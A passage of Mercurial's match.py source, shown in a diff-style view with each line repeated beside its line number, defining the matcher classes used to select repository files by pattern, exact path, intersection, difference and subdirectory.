521 False
522 """
522 """
523
523
524 def __init__(self, root, kindpats, badfn=None):
524 def __init__(self, root, kindpats, badfn=None):
525 super(patternmatcher, self).__init__(badfn)
525 super(patternmatcher, self).__init__(badfn)
526
526
527 self._files = _explicitfiles(kindpats)
527 self._files = _explicitfiles(kindpats)
528 self._prefix = _prefix(kindpats)
528 self._prefix = _prefix(kindpats)
529 self._pats, self.matchfn = _buildmatch(kindpats, '$', root)
529 self._pats, self.matchfn = _buildmatch(kindpats, '$', root)
530
530
531 @propertycache
531 @propertycache
532 def _dirs(self):
532 def _dirs(self):
533 return set(util.dirs(self._fileset))
533 return set(util.dirs(self._fileset))
534
534
535 def visitdir(self, dir):
535 def visitdir(self, dir):
536 dir = normalizerootdir(dir, 'visitdir')
536 dir = normalizerootdir(dir, 'visitdir')
537 if self._prefix and dir in self._fileset:
537 if self._prefix and dir in self._fileset:
538 return 'all'
538 return 'all'
539 return (dir in self._fileset or
539 return (dir in self._fileset or
540 dir in self._dirs or
540 dir in self._dirs or
541 any(parentdir in self._fileset
541 any(parentdir in self._fileset
542 for parentdir in util.finddirs(dir)))
542 for parentdir in util.finddirs(dir)))
543
543
544 def visitchildrenset(self, dir):
544 def visitchildrenset(self, dir):
545 ret = self.visitdir(dir)
545 ret = self.visitdir(dir)
546 if ret is True:
546 if ret is True:
547 return 'this'
547 return 'this'
548 elif not ret:
548 elif not ret:
549 return set()
549 return set()
550 assert ret == 'all'
550 assert ret == 'all'
551 return 'all'
551 return 'all'
552
552
553 def prefix(self):
553 def prefix(self):
554 return self._prefix
554 return self._prefix
555
555
556 @encoding.strmethod
556 @encoding.strmethod
557 def __repr__(self):
557 def __repr__(self):
558 return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))
558 return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))
559
559
560 # This is basically a reimplementation of util.dirs that stores the children
560 # This is basically a reimplementation of util.dirs that stores the children
561 # instead of just a count of them, plus a small optional optimization to avoid
561 # instead of just a count of them, plus a small optional optimization to avoid
562 # some directories we don't need.
562 # some directories we don't need.
563 class _dirchildren(object):
563 class _dirchildren(object):
564 def __init__(self, paths, onlyinclude=None):
564 def __init__(self, paths, onlyinclude=None):
565 self._dirs = {}
565 self._dirs = {}
566 self._onlyinclude = onlyinclude or []
566 self._onlyinclude = onlyinclude or []
567 addpath = self.addpath
567 addpath = self.addpath
568 for f in paths:
568 for f in paths:
569 addpath(f)
569 addpath(f)
570
570
571 def addpath(self, path):
571 def addpath(self, path):
572 if path == '':
572 if path == '':
573 return
573 return
574 dirs = self._dirs
574 dirs = self._dirs
575 findsplitdirs = _dirchildren._findsplitdirs
575 findsplitdirs = _dirchildren._findsplitdirs
576 for d, b in findsplitdirs(path):
576 for d, b in findsplitdirs(path):
577 if d not in self._onlyinclude:
577 if d not in self._onlyinclude:
578 continue
578 continue
579 dirs.setdefault(d, set()).add(b)
579 dirs.setdefault(d, set()).add(b)
580
580
581 @staticmethod
581 @staticmethod
582 def _findsplitdirs(path):
582 def _findsplitdirs(path):
583 # yields (dirname, basename) tuples, walking back to the root. This is
583 # yields (dirname, basename) tuples, walking back to the root. This is
584 # very similar to util.finddirs, except:
584 # very similar to util.finddirs, except:
585 # - produces a (dirname, basename) tuple, not just 'dirname'
585 # - produces a (dirname, basename) tuple, not just 'dirname'
586 # Unlike manifest._splittopdir, this does not suffix `dirname` with a
586 # Unlike manifest._splittopdir, this does not suffix `dirname` with a
587 # slash.
587 # slash.
588 oldpos = len(path)
588 oldpos = len(path)
589 pos = path.rfind('/')
589 pos = path.rfind('/')
590 while pos != -1:
590 while pos != -1:
591 yield path[:pos], path[pos + 1:oldpos]
591 yield path[:pos], path[pos + 1:oldpos]
592 oldpos = pos
592 oldpos = pos
593 pos = path.rfind('/', 0, pos)
593 pos = path.rfind('/', 0, pos)
594 yield '', path[:oldpos]
594 yield '', path[:oldpos]
595
595
596 def get(self, path):
596 def get(self, path):
597 return self._dirs.get(path, set())
597 return self._dirs.get(path, set())
598
598
599 class includematcher(basematcher):
599 class includematcher(basematcher):
600
600
601 def __init__(self, root, kindpats, badfn=None):
601 def __init__(self, root, kindpats, badfn=None):
602 super(includematcher, self).__init__(badfn)
602 super(includematcher, self).__init__(badfn)
603
603
604 self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
604 self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
605 self._prefix = _prefix(kindpats)
605 self._prefix = _prefix(kindpats)
606 roots, dirs, parents = _rootsdirsandparents(kindpats)
606 roots, dirs, parents = _rootsdirsandparents(kindpats)
607 # roots are directories which are recursively included.
607 # roots are directories which are recursively included.
608 self._roots = set(roots)
608 self._roots = set(roots)
609 # dirs are directories which are non-recursively included.
609 # dirs are directories which are non-recursively included.
610 self._dirs = set(dirs)
610 self._dirs = set(dirs)
611 # parents are directories which are non-recursively included because
611 # parents are directories which are non-recursively included because
612 # they are needed to get to items in _dirs or _roots.
612 # they are needed to get to items in _dirs or _roots.
613 self._parents = parents
613 self._parents = parents
614
614
615 def visitdir(self, dir):
615 def visitdir(self, dir):
616 dir = normalizerootdir(dir, 'visitdir')
616 dir = normalizerootdir(dir, 'visitdir')
617 if self._prefix and dir in self._roots:
617 if self._prefix and dir in self._roots:
618 return 'all'
618 return 'all'
619 return (dir in self._roots or
619 return (dir in self._roots or
620 dir in self._dirs or
620 dir in self._dirs or
621 dir in self._parents or
621 dir in self._parents or
622 any(parentdir in self._roots
622 any(parentdir in self._roots
623 for parentdir in util.finddirs(dir)))
623 for parentdir in util.finddirs(dir)))
624
624
625 @propertycache
625 @propertycache
626 def _allparentschildren(self):
626 def _allparentschildren(self):
627 # It may seem odd that we add dirs, roots, and parents, and then
627 # It may seem odd that we add dirs, roots, and parents, and then
628 # restrict to only parents. This is to catch the case of:
628 # restrict to only parents. This is to catch the case of:
629 # dirs = ['foo/bar']
629 # dirs = ['foo/bar']
630 # parents = ['foo']
630 # parents = ['foo']
631 # if we asked for the children of 'foo', but had only added
631 # if we asked for the children of 'foo', but had only added
632 # self._parents, we wouldn't be able to respond ['bar'].
632 # self._parents, we wouldn't be able to respond ['bar'].
633 return _dirchildren(
633 return _dirchildren(
634 itertools.chain(self._dirs, self._roots, self._parents),
634 itertools.chain(self._dirs, self._roots, self._parents),
635 onlyinclude=self._parents)
635 onlyinclude=self._parents)
636
636
637 def visitchildrenset(self, dir):
637 def visitchildrenset(self, dir):
638 if self._prefix and dir in self._roots:
638 if self._prefix and dir in self._roots:
639 return 'all'
639 return 'all'
640 # Note: this does *not* include the 'dir in self._parents' case from
640 # Note: this does *not* include the 'dir in self._parents' case from
641 # visitdir, that's handled below.
641 # visitdir, that's handled below.
642 if ('' in self._roots or
642 if ('' in self._roots or
643 dir in self._roots or
643 dir in self._roots or
644 dir in self._dirs or
644 dir in self._dirs or
645 any(parentdir in self._roots
645 any(parentdir in self._roots
646 for parentdir in util.finddirs(dir))):
646 for parentdir in util.finddirs(dir))):
647 return 'this'
647 return 'this'
648
648
649 if dir in self._parents:
649 if dir in self._parents:
650 return self._allparentschildren.get(dir) or set()
650 return self._allparentschildren.get(dir) or set()
651 return set()
651 return set()
652
652
653 @encoding.strmethod
653 @encoding.strmethod
654 def __repr__(self):
654 def __repr__(self):
655 return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))
655 return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))
656
656
657 class exactmatcher(basematcher):
657 class exactmatcher(basematcher):
658 r'''Matches the input files exactly. They are interpreted as paths, not
658 r'''Matches the input files exactly. They are interpreted as paths, not
659 patterns (so no kind-prefixes).
659 patterns (so no kind-prefixes).
660
660
661 >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
661 >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
662 >>> m(b'a.txt')
662 >>> m(b'a.txt')
663 True
663 True
664 >>> m(b'b.txt')
664 >>> m(b'b.txt')
665 False
665 False
666
666
667 Input files that would be matched are exactly those returned by .files()
667 Input files that would be matched are exactly those returned by .files()
668 >>> m.files()
668 >>> m.files()
669 ['a.txt', 're:.*\\.c$']
669 ['a.txt', 're:.*\\.c$']
670
670
671 So pattern 're:.*\.c$' is not considered as a regex, but as a file name
671 So pattern 're:.*\.c$' is not considered as a regex, but as a file name
672 >>> m(b'main.c')
672 >>> m(b'main.c')
673 False
673 False
674 >>> m(br're:.*\.c$')
674 >>> m(br're:.*\.c$')
675 True
675 True
676 '''
676 '''
677
677
678 def __init__(self, files, badfn=None):
678 def __init__(self, files, badfn=None):
679 super(exactmatcher, self).__init__(badfn)
679 super(exactmatcher, self).__init__(badfn)
680
680
681 if isinstance(files, list):
681 if isinstance(files, list):
682 self._files = files
682 self._files = files
683 else:
683 else:
684 self._files = list(files)
684 self._files = list(files)
685
685
686 matchfn = basematcher.exact
686 matchfn = basematcher.exact
687
687
688 @propertycache
688 @propertycache
689 def _dirs(self):
689 def _dirs(self):
690 return set(util.dirs(self._fileset))
690 return set(util.dirs(self._fileset))
691
691
692 def visitdir(self, dir):
692 def visitdir(self, dir):
693 dir = normalizerootdir(dir, 'visitdir')
693 dir = normalizerootdir(dir, 'visitdir')
694 return dir in self._dirs
694 return dir in self._dirs
695
695
696 def visitchildrenset(self, dir):
696 def visitchildrenset(self, dir):
697 dir = normalizerootdir(dir, 'visitchildrenset')
697 dir = normalizerootdir(dir, 'visitchildrenset')
698
698
699 if not self._fileset or dir not in self._dirs:
699 if not self._fileset or dir not in self._dirs:
700 return set()
700 return set()
701
701
702 candidates = self._fileset | self._dirs - {''}
702 candidates = self._fileset | self._dirs - {''}
703 if dir != '':
703 if dir != '':
704 d = dir + '/'
704 d = dir + '/'
705 candidates = set(c[len(d):] for c in candidates if
705 candidates = set(c[len(d):] for c in candidates if
706 c.startswith(d))
706 c.startswith(d))
707 # self._dirs includes all of the directories, recursively, so if
707 # self._dirs includes all of the directories, recursively, so if
708 # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
708 # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
709 # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
709 # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
710 # '/' in it, indicating a it's for a subdir-of-a-subdir; the
710 # '/' in it, indicating a it's for a subdir-of-a-subdir; the
711 # immediate subdir will be in there without a slash.
711 # immediate subdir will be in there without a slash.
712 ret = {c for c in candidates if '/' not in c}
712 ret = {c for c in candidates if '/' not in c}
713 # We really do not expect ret to be empty, since that would imply that
713 # We really do not expect ret to be empty, since that would imply that
714 # there's something in _dirs that didn't have a file in _fileset.
714 # there's something in _dirs that didn't have a file in _fileset.
715 assert ret
715 assert ret
716 return ret
716 return ret
717
717
718 def isexact(self):
718 def isexact(self):
719 return True
719 return True
720
720
721 @encoding.strmethod
721 @encoding.strmethod
722 def __repr__(self):
722 def __repr__(self):
723 return ('<exactmatcher files=%r>' % self._files)
723 return ('<exactmatcher files=%r>' % self._files)
724
724
725 class differencematcher(basematcher):
725 class differencematcher(basematcher):
726 '''Composes two matchers by matching if the first matches and the second
726 '''Composes two matchers by matching if the first matches and the second
727 does not.
727 does not.
728
728
729 The second matcher's non-matching-attributes (bad, explicitdir,
729 The second matcher's non-matching-attributes (bad, explicitdir,
730 traversedir) are ignored.
730 traversedir) are ignored.
731 '''
731 '''
732 def __init__(self, m1, m2):
732 def __init__(self, m1, m2):
733 super(differencematcher, self).__init__()
733 super(differencematcher, self).__init__()
734 self._m1 = m1
734 self._m1 = m1
735 self._m2 = m2
735 self._m2 = m2
736 self.bad = m1.bad
736 self.bad = m1.bad
737 self.explicitdir = m1.explicitdir
737 self.explicitdir = m1.explicitdir
738 self.traversedir = m1.traversedir
738 self.traversedir = m1.traversedir
739
739
740 def matchfn(self, f):
740 def matchfn(self, f):
741 return self._m1(f) and not self._m2(f)
741 return self._m1(f) and not self._m2(f)
742
742
743 @propertycache
743 @propertycache
744 def _files(self):
744 def _files(self):
745 if self.isexact():
745 if self.isexact():
746 return [f for f in self._m1.files() if self(f)]
746 return [f for f in self._m1.files() if self(f)]
747 # If m1 is not an exact matcher, we can't easily figure out the set of
747 # If m1 is not an exact matcher, we can't easily figure out the set of
748 # files, because its files() are not always files. For example, if
748 # files, because its files() are not always files. For example, if
749 # m1 is "path:dir" and m2 is "rootfileins:.", we don't
749 # m1 is "path:dir" and m2 is "rootfileins:.", we don't
750 # want to remove "dir" from the set even though it would match m2,
750 # want to remove "dir" from the set even though it would match m2,
751 # because the "dir" in m1 may not be a file.
751 # because the "dir" in m1 may not be a file.
752 return self._m1.files()
752 return self._m1.files()
753
753
754 def visitdir(self, dir):
754 def visitdir(self, dir):
755 if self._m2.visitdir(dir) == 'all':
755 if self._m2.visitdir(dir) == 'all':
756 return False
756 return False
757 elif not self._m2.visitdir(dir):
757 elif not self._m2.visitdir(dir):
758 # m2 does not match dir, we can return 'all' here if possible
758 # m2 does not match dir, we can return 'all' here if possible
759 return self._m1.visitdir(dir)
759 return self._m1.visitdir(dir)
760 return bool(self._m1.visitdir(dir))
760 return bool(self._m1.visitdir(dir))
761
761
762 def visitchildrenset(self, dir):
762 def visitchildrenset(self, dir):
763 m2_set = self._m2.visitchildrenset(dir)
763 m2_set = self._m2.visitchildrenset(dir)
764 if m2_set == 'all':
764 if m2_set == 'all':
765 return set()
765 return set()
766 m1_set = self._m1.visitchildrenset(dir)
766 m1_set = self._m1.visitchildrenset(dir)
767 # Possible values for m1: 'all', 'this', set(...), set()
767 # Possible values for m1: 'all', 'this', set(...), set()
768 # Possible values for m2: 'this', set(...), set()
768 # Possible values for m2: 'this', set(...), set()
769 # If m2 has nothing under here that we care about, return m1, even if
769 # If m2 has nothing under here that we care about, return m1, even if
770 # it's 'all'. This is a change in behavior from visitdir, which would
770 # it's 'all'. This is a change in behavior from visitdir, which would
771 # return True, not 'all', for some reason.
771 # return True, not 'all', for some reason.
772 if not m2_set:
772 if not m2_set:
773 return m1_set
773 return m1_set
774 if m1_set in ['all', 'this']:
774 if m1_set in ['all', 'this']:
775 # Never return 'all' here if m2_set is any kind of non-empty (either
775 # Never return 'all' here if m2_set is any kind of non-empty (either
776 # 'this' or set(foo)), since m2 might return set() for a
776 # 'this' or set(foo)), since m2 might return set() for a
777 # subdirectory.
777 # subdirectory.
778 return 'this'
778 return 'this'
779 # Possible values for m1: set(...), set()
779 # Possible values for m1: set(...), set()
780 # Possible values for m2: 'this', set(...)
780 # Possible values for m2: 'this', set(...)
781 # We ignore m2's set results. They're possibly incorrect:
781 # We ignore m2's set results. They're possibly incorrect:
782 # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
782 # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
783 # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
783 # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
784 # return set(), which is *not* correct, we still need to visit 'dir'!
784 # return set(), which is *not* correct, we still need to visit 'dir'!
785 return m1_set
785 return m1_set
786
786
787 def isexact(self):
787 def isexact(self):
788 return self._m1.isexact()
788 return self._m1.isexact()
789
789
790 @encoding.strmethod
790 @encoding.strmethod
791 def __repr__(self):
791 def __repr__(self):
792 return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))
792 return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))
793
793
794 def intersectmatchers(m1, m2):
794 def intersectmatchers(m1, m2):
795 '''Composes two matchers by matching if both of them match.
795 '''Composes two matchers by matching if both of them match.
796
796
797 The second matcher's non-matching-attributes (bad, explicitdir,
797 The second matcher's non-matching-attributes (bad, explicitdir,
798 traversedir) are ignored.
798 traversedir) are ignored.
799 '''
799 '''
800 if m1 is None or m2 is None:
800 if m1 is None or m2 is None:
801 return m1 or m2
801 return m1 or m2
802 if m1.always():
802 if m1.always():
803 m = copy.copy(m2)
803 m = copy.copy(m2)
804 # TODO: Consider encapsulating these things in a class so there's only
804 # TODO: Consider encapsulating these things in a class so there's only
805 # one thing to copy from m1.
805 # one thing to copy from m1.
806 m.bad = m1.bad
806 m.bad = m1.bad
807 m.explicitdir = m1.explicitdir
807 m.explicitdir = m1.explicitdir
808 m.traversedir = m1.traversedir
808 m.traversedir = m1.traversedir
809 return m
809 return m
810 if m2.always():
810 if m2.always():
811 m = copy.copy(m1)
811 m = copy.copy(m1)
812 return m
812 return m
813 return intersectionmatcher(m1, m2)
813 return intersectionmatcher(m1, m2)
814
814
815 class intersectionmatcher(basematcher):
815 class intersectionmatcher(basematcher):
816 def __init__(self, m1, m2):
816 def __init__(self, m1, m2):
817 super(intersectionmatcher, self).__init__()
817 super(intersectionmatcher, self).__init__()
818 self._m1 = m1
818 self._m1 = m1
819 self._m2 = m2
819 self._m2 = m2
820 self.bad = m1.bad
820 self.bad = m1.bad
821 self.explicitdir = m1.explicitdir
821 self.explicitdir = m1.explicitdir
822 self.traversedir = m1.traversedir
822 self.traversedir = m1.traversedir
823
823
824 @propertycache
824 @propertycache
825 def _files(self):
825 def _files(self):
826 if self.isexact():
826 if self.isexact():
827 m1, m2 = self._m1, self._m2
827 m1, m2 = self._m1, self._m2
828 if not m1.isexact():
828 if not m1.isexact():
829 m1, m2 = m2, m1
829 m1, m2 = m2, m1
830 return [f for f in m1.files() if m2(f)]
830 return [f for f in m1.files() if m2(f)]
831 # It neither m1 nor m2 is an exact matcher, we can't easily intersect
831 # It neither m1 nor m2 is an exact matcher, we can't easily intersect
832 # the set of files, because their files() are not always files. For
832 # the set of files, because their files() are not always files. For
833 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
833 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
834 # "path:dir2", we don't want to remove "dir2" from the set.
834 # "path:dir2", we don't want to remove "dir2" from the set.
835 return self._m1.files() + self._m2.files()
835 return self._m1.files() + self._m2.files()
836
836
837 def matchfn(self, f):
837 def matchfn(self, f):
838 return self._m1(f) and self._m2(f)
838 return self._m1(f) and self._m2(f)
839
839
840 def visitdir(self, dir):
840 def visitdir(self, dir):
841 visit1 = self._m1.visitdir(dir)
841 visit1 = self._m1.visitdir(dir)
842 if visit1 == 'all':
842 if visit1 == 'all':
843 return self._m2.visitdir(dir)
843 return self._m2.visitdir(dir)
844 # bool() because visit1=True + visit2='all' should not be 'all'
844 # bool() because visit1=True + visit2='all' should not be 'all'
845 return bool(visit1 and self._m2.visitdir(dir))
845 return bool(visit1 and self._m2.visitdir(dir))
846
846
847 def visitchildrenset(self, dir):
847 def visitchildrenset(self, dir):
848 m1_set = self._m1.visitchildrenset(dir)
848 m1_set = self._m1.visitchildrenset(dir)
849 if not m1_set:
849 if not m1_set:
850 return set()
850 return set()
851 m2_set = self._m2.visitchildrenset(dir)
851 m2_set = self._m2.visitchildrenset(dir)
852 if not m2_set:
852 if not m2_set:
853 return set()
853 return set()
854
854
855 if m1_set == 'all':
855 if m1_set == 'all':
856 return m2_set
856 return m2_set
857 elif m2_set == 'all':
857 elif m2_set == 'all':
858 return m1_set
858 return m1_set
859
859
860 if m1_set == 'this' or m2_set == 'this':
860 if m1_set == 'this' or m2_set == 'this':
861 return 'this'
861 return 'this'
862
862
863 assert isinstance(m1_set, set) and isinstance(m2_set, set)
863 assert isinstance(m1_set, set) and isinstance(m2_set, set)
864 return m1_set.intersection(m2_set)
864 return m1_set.intersection(m2_set)
865
865
866 def always(self):
866 def always(self):
867 return self._m1.always() and self._m2.always()
867 return self._m1.always() and self._m2.always()
868
868
869 def isexact(self):
869 def isexact(self):
870 return self._m1.isexact() or self._m2.isexact()
870 return self._m1.isexact() or self._m2.isexact()
871
871
872 @encoding.strmethod
872 @encoding.strmethod
873 def __repr__(self):
873 def __repr__(self):
874 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
874 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
875
875
876 class subdirmatcher(basematcher):
876 class subdirmatcher(basematcher):
877 """Adapt a matcher to work on a subdirectory only.
877 """Adapt a matcher to work on a subdirectory only.
878
878
879 The paths are remapped to remove/insert the path as needed:
879 The paths are remapped to remove/insert the path as needed:
880
880
881 >>> from . import pycompat
881 >>> from . import pycompat
882 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
882 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
883 >>> m2 = subdirmatcher(b'sub', m1)
883 >>> m2 = subdirmatcher(b'sub', m1)
884 >>> m2(b'a.txt')
884 >>> m2(b'a.txt')
885 False
885 False
886 >>> m2(b'b.txt')
886 >>> m2(b'b.txt')
887 True
887 True
888 >>> m2.matchfn(b'a.txt')
888 >>> m2.matchfn(b'a.txt')
889 False
889 False
890 >>> m2.matchfn(b'b.txt')
890 >>> m2.matchfn(b'b.txt')
891 True
891 True
892 >>> m2.files()
892 >>> m2.files()
893 ['b.txt']
893 ['b.txt']
894 >>> m2.exact(b'b.txt')
894 >>> m2.exact(b'b.txt')
895 True
895 True
896 >>> def bad(f, msg):
896 >>> def bad(f, msg):
897 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
897 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
898 >>> m1.bad = bad
898 >>> m1.bad = bad
899 >>> m2.bad(b'x.txt', b'No such file')
899 >>> m2.bad(b'x.txt', b'No such file')
900 sub/x.txt: No such file
900 sub/x.txt: No such file
901 """
901 """
902
902
903 def __init__(self, path, matcher):
903 def __init__(self, path, matcher):
904 super(subdirmatcher, self).__init__()
904 super(subdirmatcher, self).__init__()
905 self._path = path
905 self._path = path
906 self._matcher = matcher
906 self._matcher = matcher
907 self._always = matcher.always()
907 self._always = matcher.always()
908
908
909 self._files = [f[len(path) + 1:] for f in matcher._files
909 self._files = [f[len(path) + 1:] for f in matcher._files
910 if f.startswith(path + "/")]
910 if f.startswith(path + "/")]
911
911
912 # If the parent repo had a path to this subrepo and the matcher is
912 # If the parent repo had a path to this subrepo and the matcher is
913 # a prefix matcher, this submatcher always matches.
913 # a prefix matcher, this submatcher always matches.
914 if matcher.prefix():
914 if matcher.prefix():
915 self._always = any(f == path for f in matcher._files)
915 self._always = any(f == path for f in matcher._files)
916
916
917 def bad(self, f, msg):
917 def bad(self, f, msg):
918 self._matcher.bad(self._path + "/" + f, msg)
918 self._matcher.bad(self._path + "/" + f, msg)
919
919
920 def matchfn(self, f):
920 def matchfn(self, f):
921 # Some information is lost in the superclass's constructor, so we
921 # Some information is lost in the superclass's constructor, so we
922 # can not accurately create the matching function for the subdirectory
922 # can not accurately create the matching function for the subdirectory
923 # from the inputs. Instead, we override matchfn() and visitdir() to
923 # from the inputs. Instead, we override matchfn() and visitdir() to
924 # call the original matcher with the subdirectory path prepended.
924 # call the original matcher with the subdirectory path prepended.
925 return self._matcher.matchfn(self._path + "/" + f)
925 return self._matcher.matchfn(self._path + "/" + f)
926
926
927 def visitdir(self, dir):
927 def visitdir(self, dir):
928 dir = normalizerootdir(dir, 'visitdir')
928 dir = normalizerootdir(dir, 'visitdir')
929 if dir == '':
929 if dir == '':
930 dir = self._path
930 dir = self._path
931 else:
931 else:
932 dir = self._path + "/" + dir
932 dir = self._path + "/" + dir
933 return self._matcher.visitdir(dir)
933 return self._matcher.visitdir(dir)
934
934
935 def visitchildrenset(self, dir):
935 def visitchildrenset(self, dir):
936 dir = normalizerootdir(dir, 'visitchildrenset')
936 dir = normalizerootdir(dir, 'visitchildrenset')
937 if dir == '':
937 if dir == '':
938 dir = self._path
938 dir = self._path
939 else:
939 else:
940 dir = self._path + "/" + dir
940 dir = self._path + "/" + dir
941 return self._matcher.visitchildrenset(dir)
941 return self._matcher.visitchildrenset(dir)
942
942
943 def always(self):
943 def always(self):
944 return self._always
944 return self._always
945
945
946 def prefix(self):
946 def prefix(self):
947 return self._matcher.prefix() and not self._always
947 return self._matcher.prefix() and not self._always
948
948
949 @encoding.strmethod
949 @encoding.strmethod
950 def __repr__(self):
950 def __repr__(self):
951 return ('<subdirmatcher path=%r, matcher=%r>' %
951 return ('<subdirmatcher path=%r, matcher=%r>' %
952 (self._path, self._matcher))
952 (self._path, self._matcher))
953
953
954 class prefixdirmatcher(basematcher):
954 class prefixdirmatcher(basematcher):
955 """Adapt a matcher to work on a parent directory.
955 """Adapt a matcher to work on a parent directory.
956
956
957 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
957 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
958 ignored.
958 ignored.
959
959
960 The prefix path should usually be the relative path from the root of
960 The prefix path should usually be the relative path from the root of
961 this matcher to the root of the wrapped matcher.
961 this matcher to the root of the wrapped matcher.
962
962
963 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
963 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
964 >>> m2 = prefixdirmatcher(b'd/e', m1)
964 >>> m2 = prefixdirmatcher(b'd/e', m1)
965 >>> m2(b'a.txt')
965 >>> m2(b'a.txt')
966 False
966 False
967 >>> m2(b'd/e/a.txt')
967 >>> m2(b'd/e/a.txt')
968 True
968 True
969 >>> m2(b'd/e/b.txt')
969 >>> m2(b'd/e/b.txt')
970 False
970 False
971 >>> m2.files()
971 >>> m2.files()
972 ['d/e/a.txt', 'd/e/f/b.txt']
972 ['d/e/a.txt', 'd/e/f/b.txt']
973 >>> m2.exact(b'd/e/a.txt')
973 >>> m2.exact(b'd/e/a.txt')
974 True
974 True
975 >>> m2.visitdir(b'd')
975 >>> m2.visitdir(b'd')
976 True
976 True
977 >>> m2.visitdir(b'd/e')
977 >>> m2.visitdir(b'd/e')
978 True
978 True
979 >>> m2.visitdir(b'd/e/f')
979 >>> m2.visitdir(b'd/e/f')
980 True
980 True
981 >>> m2.visitdir(b'd/e/g')
981 >>> m2.visitdir(b'd/e/g')
982 False
982 False
983 >>> m2.visitdir(b'd/ef')
983 >>> m2.visitdir(b'd/ef')
984 False
984 False
985 """
985 """
986
986
987 def __init__(self, path, matcher, badfn=None):
987 def __init__(self, path, matcher, badfn=None):
988 super(prefixdirmatcher, self).__init__(badfn)
988 super(prefixdirmatcher, self).__init__(badfn)
989 if not path:
989 if not path:
990 raise error.ProgrammingError('prefix path must not be empty')
990 raise error.ProgrammingError('prefix path must not be empty')
991 self._path = path
991 self._path = path
992 self._pathprefix = path + '/'
992 self._pathprefix = path + '/'
993 self._matcher = matcher
993 self._matcher = matcher
994
994
995 @propertycache
995 @propertycache
996 def _files(self):
996 def _files(self):
997 return [self._pathprefix + f for f in self._matcher._files]
997 return [self._pathprefix + f for f in self._matcher._files]
998
998
999 def matchfn(self, f):
999 def matchfn(self, f):
1000 if not f.startswith(self._pathprefix):
1000 if not f.startswith(self._pathprefix):
1001 return False
1001 return False
1002 return self._matcher.matchfn(f[len(self._pathprefix):])
1002 return self._matcher.matchfn(f[len(self._pathprefix):])
1003
1003
1004 @propertycache
1004 @propertycache
1005 def _pathdirs(self):
1005 def _pathdirs(self):
1006 return set(util.finddirs(self._path))
1006 return set(util.finddirs(self._path))
1007
1007
1008 def visitdir(self, dir):
1008 def visitdir(self, dir):
1009 if dir == self._path:
1009 if dir == self._path:
1010 return self._matcher.visitdir('')
1010 return self._matcher.visitdir('')
1011 if dir.startswith(self._pathprefix):
1011 if dir.startswith(self._pathprefix):
1012 return self._matcher.visitdir(dir[len(self._pathprefix):])
1012 return self._matcher.visitdir(dir[len(self._pathprefix):])
1013 return dir in self._pathdirs
1013 return dir in self._pathdirs
1014
1014
1015 def visitchildrenset(self, dir):
1015 def visitchildrenset(self, dir):
1016 if dir == self._path:
1016 if dir == self._path:
1017 return self._matcher.visitchildrenset('')
1017 return self._matcher.visitchildrenset('')
1018 if dir.startswith(self._pathprefix):
1018 if dir.startswith(self._pathprefix):
1019 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1019 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1020 if dir in self._pathdirs:
1020 if dir in self._pathdirs:
1021 return 'this'
1021 return 'this'
1022 return set()
1022 return set()
1023
1023
1024 def isexact(self):
1024 def isexact(self):
1025 return self._matcher.isexact()
1025 return self._matcher.isexact()
1026
1026
1027 def prefix(self):
1027 def prefix(self):
1028 return self._matcher.prefix()
1028 return self._matcher.prefix()
1029
1029
1030 @encoding.strmethod
1030 @encoding.strmethod
1031 def __repr__(self):
1031 def __repr__(self):
1032 return ('<prefixdirmatcher path=%r, matcher=%r>'
1032 return ('<prefixdirmatcher path=%r, matcher=%r>'
1033 % (pycompat.bytestr(self._path), self._matcher))
1033 % (pycompat.bytestr(self._path), self._matcher))
1034
1034
1035 class unionmatcher(basematcher):
1035 class unionmatcher(basematcher):
1036 """A matcher that is the union of several matchers.
1036 """A matcher that is the union of several matchers.
1037
1037
1038 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1038 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1039 the first matcher.
1039 the first matcher.
1040 """
1040 """
1041
1041
1042 def __init__(self, matchers):
1042 def __init__(self, matchers):
1043 m1 = matchers[0]
1043 m1 = matchers[0]
1044 super(unionmatcher, self).__init__()
1044 super(unionmatcher, self).__init__()
1045 self.explicitdir = m1.explicitdir
1045 self.explicitdir = m1.explicitdir
1046 self.traversedir = m1.traversedir
1046 self.traversedir = m1.traversedir
1047 self._matchers = matchers
1047 self._matchers = matchers
1048
1048
1049 def matchfn(self, f):
1049 def matchfn(self, f):
1050 for match in self._matchers:
1050 for match in self._matchers:
1051 if match(f):
1051 if match(f):
1052 return True
1052 return True
1053 return False
1053 return False
1054
1054
1055 def visitdir(self, dir):
1055 def visitdir(self, dir):
1056 r = False
1056 r = False
1057 for m in self._matchers:
